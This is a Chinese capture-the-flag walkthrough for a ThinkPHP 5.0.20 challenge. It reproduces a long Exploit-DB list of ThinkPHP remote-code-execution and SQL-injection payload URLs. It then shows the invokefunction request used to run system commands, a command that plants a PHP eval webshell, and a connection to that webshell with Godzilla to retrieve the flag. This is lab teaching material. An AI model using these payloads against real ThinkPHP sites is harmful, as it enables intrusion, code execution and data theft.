题目描述

暂无

Solution

打开网页,发现是 ThinkPHP V5 框架编写的网页:

005-1.png

在 URL 后面随便加一点东西,可以确定 ThinkPHP 的具体版本为:5.0.20

005-2.png

众所周知,ThinkPHP V5 框架是存在漏洞的,我们进入 Kali 搜索一下:

005-3.png

我们执行下列命令查看漏洞信息:

  1. ┌──(cheerykali)-[~]
  2. └─$ cat /usr/share/exploitdb/exploits/php/webapps/46150.txt
  3. # Exploit Title: thinkphp 5.X RCE
  4. # Date: 2019-1-14
  5. # Exploit Author: vr_system
  6. # Vendor Homepage: http://www.thinkphp.cn/
  7. # Software Link: http://www.thinkphp.cn/down.html
  8. # Version: 5.x
  9. # Tested on: windows 7/10
  10. # CVE : None
  12. https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
  14. 1https://blog.thinkphp.cn/869075
  15. 2https://blog.thinkphp.cn/910675
  17. POC
  19. thinkphp 5.0.22
  20. 1http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
  21. 2http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
  22. 3http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  23. 4http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  25. thinkphp 5
  26. 5http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
  28. thinkphp 5.0.21
  29. 6http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  30. 7http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  32. thinkphp 5.1.*
  33. 8http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
  34. 9http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
  35. 10http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
  36. 11http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
  37. 12http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  38. 13http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
  39. 14http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  40. 15http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
  42. 未知版本
  43. 16、?s=index/\think\module/action/param1/${@phpinfo()}
  44. 17、?s=index/\think\Module/Action/Param/${@phpinfo()}
  45. 18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
  46. 19index.php?s=/home/article/view_recent/name/1'
  47. header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
  48. 20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
  49. 21、index.php?s=/home/shopcart/getpriceNum/id/1%27
  50. 22、index.php?s=/home/user/cut/id/1%27
  51. 23、index.php?s=/home/service/index/id/1%27
  52. 24、index.php?s=/home/pay/chongzhi/orderid/1%27
  53. 25、index.php?s=/home/pay/index/orderid/1%27
  54. 26、index.php?s=/home/order/complete/id/1%27
  55. 27、index.php?s=/home/order/complete/id/1%27
  56. 28、index.php?s=/home/order/detail/id/1%27
  57. 29、index.php?s=/home/order/cancel/id/1%27
  58. 30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
  59. 31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
  60. Content-Disposition: form-data; name="couponid"
  61. 1') union select sleep('''+str(sleep_time)+''')#
  63. thinkphp 5.0.23(完整版)debug模式
  64. 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
  66. thinkphp 5.0.23(完整版)
  67. 33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
  69. thhinkphp 5.0.10(完整版)
  70. 34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

我们根据上述文本的第 1 条博客(869075),可以看到漏洞影响范围包括5.05.1的版本。由于本题的环境是5.0.20,我们可以尝试一下thinkphp 5.0.21的 POC(第 6、7条):

  1. http://111.200.241.244:56948/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

005-4.png

我们写入 Webshll 木马,然后ls检查一下:

http://111.200.241.244:56948/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST["banana"]);' > shell.php

http://111.200.241.244:56948/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

005-5.png

最后我们试一试用哥斯拉去连接 WebShell:

005-6.png

测试成功,我们直接连进去:

005-7.png

最后我们执行命令find / -name "flag",结果显示在/目录下,找到 Flag:

005-8.png